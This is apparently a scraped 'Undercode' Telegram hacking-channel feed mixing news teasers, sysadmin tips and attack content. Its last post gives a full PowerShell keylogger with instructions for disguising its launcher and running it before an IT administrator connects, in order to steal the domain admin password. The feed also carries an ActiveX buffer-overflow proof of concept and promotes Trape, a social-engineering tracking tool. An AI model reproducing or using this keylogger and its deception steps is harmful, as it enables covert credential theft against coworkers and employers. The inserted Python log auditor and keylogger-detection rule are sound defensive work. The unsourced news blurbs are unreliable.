UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity

1️⃣ World first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A GOOD WORKING TRACKING TOOL 2020:

Trape is an OSINT analysis and research tool that allows people to track and execute intelligent social engineering attacks in real time. It was created to teach the world how large Internet companies could obtain confidential information, such as the status of sessions on their websites or services, and control their users through the browser without their knowledge, but it has evolved with the aim of helping government organizations, companies and researchers track cybercriminals.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 trape.py -h
If it does not work, install all the libraries listed in the file requirements.txt:

4) python2 -m pip install -r requirements.txt

Example of execution

🦑 Example: python2 trape.py --url http://example.com --port 8080

HELP AND OPTIONS

user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 MalConfScan: Volatility plugin to extract configuration data for known malware:

Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan also has a function for displaying a list of strings referenced by malicious code.

Configuration data is usually encoded by malware.

Because the malware writes the decoded configuration data to memory, that data may still be in memory.

This function can list the decoded configuration data.

🦑 https://github.com/JPCERTCC/MalConfScan/wiki/how-to-install

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to install Apache mod_cloudflare on Debian?

1) Cloudflare provides an official module for the Apache server to capture the visitor's real IP address.

2) Add GPG - Open a terminal and run the following commands to add the GPG key to your system.

sudo apt install curl

curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -

Add PPA - Then add the Cloudflare repository to your Debian system.

echo "deb http://pkg.cloudflare.com/ $(lsb_release -cs) main" |
sudo tee /etc/apt/sources.list.d/cloudflare.list

3) Install the package - Then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.

sudo apt update

sudo apt install libapache2-mod-cloudflare

4) Press "Y" to confirm the request during installation.

5) Restart Apache - After the installation is complete, restart the Apache2 service and check the active modules using the following commands.

sudo systemctl restart apache2

sudo apache2ctl -M

6) That's all. The Apache server now logs the visitor's real IP address.
@UndercodeTesting
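
A check for the claim in step 6, as an added example that is not part of the original post: it audits Apache access-log lines and reports any request where the logged client is still a Cloudflare edge address, which suggests the module did not rewrite the client IP for that request. The range list is a snapshot of Cloudflare's published IPv4 ranges and is an assumption that may be stale; the log lines are constructed.

```python
import ipaddress

# Snapshot of Cloudflare's published IPv4 ranges (assumption: may be stale;
# refresh from https://www.cloudflare.com/ips-v4 before relying on it).
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

def is_cloudflare_edge(addr):
    """True if addr is an IPv4 address inside one of the edge ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # hostname or garbage, not an IP literal
    return ip.version == 4 and any(ip in net for net in CLOUDFLARE_V4)

def audit_access_log(lines):
    """Sort log lines by what the first field (the logged client) contains."""
    report = {"real_client": [], "edge_logged": [], "unparsed": []}
    for line in lines:
        fields = line.split()
        if not fields:
            continue
        client = fields[0]
        try:
            ipaddress.ip_address(client)
        except ValueError:
            report["unparsed"].append(line)  # e.g. HostnameLookups is on
            continue
        key = "edge_logged" if is_cloudflare_edge(client) else "real_client"
        report[key].append(client)
    return report

# Constructed sample in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Nov/2020:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.68"',
    '162.158.90.12 - - [07/Nov/2020:10:00:02 +0000] "GET /login HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Nov/2020:10:00:03 +0000] "POST /api HTTP/1.1" 201 88 "-" "Mozilla/5.0"',
    '172.68.1.5 - - [07/Nov/2020:10:00:04 +0000] "GET /img.png HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    result = audit_access_log(SAMPLE_LOG)
    print("edge addresses still logged:", result["edge_logged"])
```

An empty edge_logged list on fresh traffic is the expected result once the module is active for every virtual host.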
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODER
New unpatched IBM QRadar SIEM vulnerability could allow an attacker to bypass access restrictions to data.
#Vulnerabilities

READ MORE - https://undercodenews.com/new-unpatched-ibm-qradar-siem-vulnerability-could-allow-a-attacker-can-bypass-access-restrictions-to-data/07/11/2020/
Forwarded from UNDERCODE NEWS
Largest cryptocurrency seizure: $1,000,000,000 was seized from the wallet of the Silk Road.
#DataBreaches
Forwarded from UNDERCODE NEWS
New Critical unpatched Vulnerability in Micro Focus can leak the password login.
#Vulnerabilities
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is PaaS?

1) Platform-as-a-Service (PaaS) is a cloud computing model that provides a platform on which customers can develop, secure, run, and manage web applications.
It provides an optimized environment in which different teams can develop and deploy applications without buying or managing the underlying IT infrastructure and related services.

2) Typically, the platform provides the necessary resources and infrastructure to support the entire software development and deployment lifecycle, while providing developers and users with access from anywhere over the Internet.

3) The benefits of PaaS include, but are not limited to, simplicity, convenience, lower cost, flexibility, and scalability.

4) Typically PaaS protection differs from a traditional on-premises datacenter, as we'll see.

5) The PaaS environment is based on a shared security model.

6) The provider protects the infrastructure, and PaaS customers are responsible for protecting their accounts, applications, and data hosted on the platform.
Ideally, security moves from a local security model to an identity perimeter.

This means that the PaaS customer must place more emphasis on identity as the primary security perimeter.

Issues to look out for include security, testing, code, data and configuration, employees, users, authentication, operations, monitoring, and logs.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to create a hidden folder with password in Win system:

1) First create a folder and name it "hidden files";

2) Then open the folder, right-click in a blank area of the window and select the "New → Text Document" command to create a text file;

3) Copy the following code into the newly created text file:

@ECHO OFF
title Folder Private
REM If the renamed folder exists it is currently locked: ask for the password
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
REM Rename the folder and mark it hidden + system; the contents are not encrypted
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
REM The password is compared against the plain-text value stored in this file
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
REM First run: create the folder that will later be locked
md Private
echo Private created successfully
goto End
:End

4) Replace "PASSWORD_GOES_HERE" with the password you want, such as 12345; the resulting line is: if NOT %pass%== 12345 goto FAIL

5) Then save the text file in .bat format; the file name can be set to "locker.bat". Reminder: set the save type to "All files" so that it saves successfully;

6) Double-click the "Locker.bat" file again to make the contents of the "Private" folder disappear. Enter "Y" in the command prompt window that appears and press Enter; at this point the folder is hidden.

@UndercodeTesting
don't clone our tips:)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC for 2008-2012 versions:

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

💉 App security tips for mobile, web, and desktop apps:

1) Make sure your application has no vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.

Make sure there are no known vulnerabilities in your application.

This applies whether it is a web application, mobile application, or desktop application; vulnerability remediation will help prevent threats.

2) Consider testing the security of your application before shipping it to production.
To eliminate vulnerabilities, you can conduct security testing of your applications.

Security testing doesn't slow down the development process.

Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.

Therefore, consider checking the security of your applications before going into production.

3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.

This program allows your organization to find and fix bugs before they become known to the public or known hackers.

This way you can prevent incidents.

4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.

Knowledge of cybersecurity can help your organization counter threats to your applications.

5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.

Consider using an automated scanner that will run tests daily.

You can also use vulnerability scanning tools that are automated.

Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.

6) Think before using open source in your application
Open source can be vulnerable.

Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.

So think twice before using open source in your application.

Riskemy.com says, "Just one line of broken code can destroy an entire site."

7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.

8) Penetration testing also helps protect your applications
Penetration testing is also known as a pentest.

Penetration testing is useful for protecting applications from cybercriminals.

Penetration testing is the practice of discovering vulnerabilities in a computer system, network, or web application that an attacker could exploit.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
New Samsung Vulnerability allows attackers to bypass authentication for a locked Gallery.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Many unpatched Vulnerabilities in Android LG devices.
#Vulnerabilities
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to check for unnecessary subscriptions on iPhone?
#FastTips

1) These days, one-time purchases of games, music, books, news, movies, and TV shows on mobile are being replaced by monthly subscriptions. It is enough to subscribe once and the funds will be automatically debited every month. There are free trial periods, to gain access to which you also need to subscribe to the service. After that, you can forget to unsubscribe if you don't want to pay. Or some don't know how to unsubscribe. We will tell you how to avoid such troubles.

2) There are several ways to check for subscriptions on iPhone, whether paid or free. Subscriptions made with your Apple ID account are verified. Services like Apple Arcade, Apple News +, Apple Music, Apple TV +, Apple TV, and third-party services appear in one place.

3) You can access the subscription management page from applications such as Books, Music, iTunes Store. The fastest way to do this is in system settings, App Store and TV apps.

Settings: Apple ID -> Subscriptions

Profile icon (in Today, Games, Apps and Arcade) -> Subscriptions in the App Store

4) Settings (left), App Store (center), TV (right)

Once on the subscription page, you will see all subscriptions associated with your Apple ID account, active and expired. To cancel, click under the active ones, then click "Cancel free trial" or "Cancel subscription", then in the window click "Confirm".

5) Keep in mind that these are only Apple ID-related subscriptions. You may have others with other accounts that do not appear on this page. If you suspect the existence of such subscriptions, check the corresponding applications. Examples include subscriptions to GrubHub, DoorDash, Netflix, Hulu.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Tech giants face more investigations, Apple’s app store can’t stand alone.
#international
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑⚙️ How to get an admin password on a work PC in an Active Directory domain?

A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.

B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.


c) Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

๐Ÿฆ‘Start-KeyLogger

Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command

@UndercodeTesting
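
For defenders: with PowerShell script block logging enabled, the script in this post is recorded as Event ID 4104 text, and its combination of Add-Type, user32.dll keyboard imports, an endless polling loop and file writes is distinctive. The triage code below is an added example, not part of the original post; the host names, the sample script text and the threshold of 3 are constructed assumptions.

```python
import re

# Win32 keyboard APIs that the script in this post imports from user32.dll.
KEY_APIS = ("GetAsyncKeyState", "GetKeyboardState", "MapVirtualKey", "ToUnicode")

def squash(text):
    """Lower-case and drop whitespace/backticks so spacing tricks don't hide tokens."""
    return re.sub(r"[\s`]+", "", text).lower()

def score_script_block(text):
    """Return (score, reasons) for the text of one logged script block."""
    flat = squash(text)
    apis = [a for a in KEY_APIS if a.lower() in flat]
    reasons = []
    if 'dllimport("user32.dll"' in flat and apis:
        reasons.append("P/Invoke of user32 keyboard APIs: " + ", ".join(apis))
    if "add-type" in flat and "-memberdefinition" in flat:
        reasons.append("Add-Type compiles inline signatures")
    if "getasynckeystate" in flat and "while($true)" in flat:
        reasons.append("GetAsyncKeyState polled in an endless loop")
    if apis and re.search(r"appendalltext|out-file|add-content", flat):
        reasons.append("captured keys written to disk")
    return len(reasons), reasons

def triage(events, threshold=3):
    """Return (host, score, reasons) for every event at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_script_block(ev["script"])
        if score >= threshold:
            hits.append((ev["host"], score, reasons))
    return hits

# Constructed sample events (host names and script text are made up).
SAMPLE_EVENTS = [
    {"host": "WS-0142", "script": (
        "$sig = @'\n[DllImport (\"user32.dll\", CharSet = CharSet.Auto)]\n"
        "public static extern short GetAsyncKeyState (int vk);\n'@\n"
        "$API = Add-Type -MemberDefinition $sig -Name 'Win32' -Namespace API -PassThru\n"
        "while ($true) { $s = $API::GetAsyncKeyState($k)\n"
        " [System.IO.File]::AppendAllText($Path, $c) }")},
    {"host": "WS-0007", "script": (
        "Add-Type -MemberDefinition '[DllImport(\"user32.dll\")] public static "
        "extern bool ShowWindow(IntPtr h, int n);' -Name Win -Namespace Native")},
    {"host": "SRV-APP1", "script":
        "while ($true) { Get-Process | Out-File C:\\logs\\proc.txt; Start-Sleep 60 }"},
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(host, score, *reasons, sep="\n  ")
```

The two benign samples score 1 and 0, which shows why the rule requires several indicators together rather than alerting on Add-Type or an endless loop alone.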
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁